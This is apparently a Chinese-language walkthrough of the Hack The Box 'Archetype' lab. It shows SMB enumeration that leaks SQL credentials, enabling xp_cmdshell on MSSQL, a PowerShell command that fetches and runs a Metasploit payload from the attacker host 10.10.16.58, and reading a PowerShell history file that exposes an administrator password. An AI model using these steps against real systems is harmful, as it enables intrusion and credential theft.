Hack The Box系列—Archetype

image-20240716150043365

一、端口扫描

1、快速扫描

image-20240714174834523

2、漏洞探测

image-20240714181223120

发现 Microsoft Windows 的 CVE-2008-4250远程代码执行漏洞

二、SMB信息收集

空密码进行SMB登陆

image-20240714181443949

进行SMB连接

image-20240714181735993

似乎是sql 的账号密码

image-20240714181819976

三、MSSQL信息收集

1、连接mssql

使用impacket包的mssql客户端脚本连接mssql

image-20240714182506119

查看数据库的权限

四、Getshell

xp_cmdshell 可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,是 sql servevr 的原生工具,该扩展存储过程可用于催生Windows命令外壳;我们需要修改配置

1
2
3
4
EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

之后执行命令,执行成功

1
EXEC xp_cmdshell 'net user';

image-20240714184901257

我们利用msf 生成exe 进行上传和执行

image-20240714185333481

通过mssql 下载到可下载的目录

1
EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.16.58:8000/shell.exe -outfile shell.exe"

image-20240714185637204

msf进行监听并执行shell.exe

1
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\shell.exe"

image-20240714190034267

image-20240714190112459

五、权限提升

看下powershell 的历史命令

1
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

image-20240714192414862

看到admininstrator 的密码 MEGACORP_4dm1n!!

使用psexec 进行登陆连接

PsExec 是一种轻型 telnet-replacement,可用于在其他系统上执行进程,无需手动安装客户端软件即可完成控制台应用程序的完整交互性。 PsExec 最强大的用途包括在远程系统和远程启用工具(如 IpConfig)上启动交互式命令提示符。psexec的使用不需要对方主机开机3389端口,只需要对方开启admin共享或c(该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(因为防火墙默认禁止445端口的连接),psexec也是不能使用的,会提示找不到网络路径。由于psexec是windows提供的工具,所以杀毒软件会将其添加到白名单中。

image-20240714193342548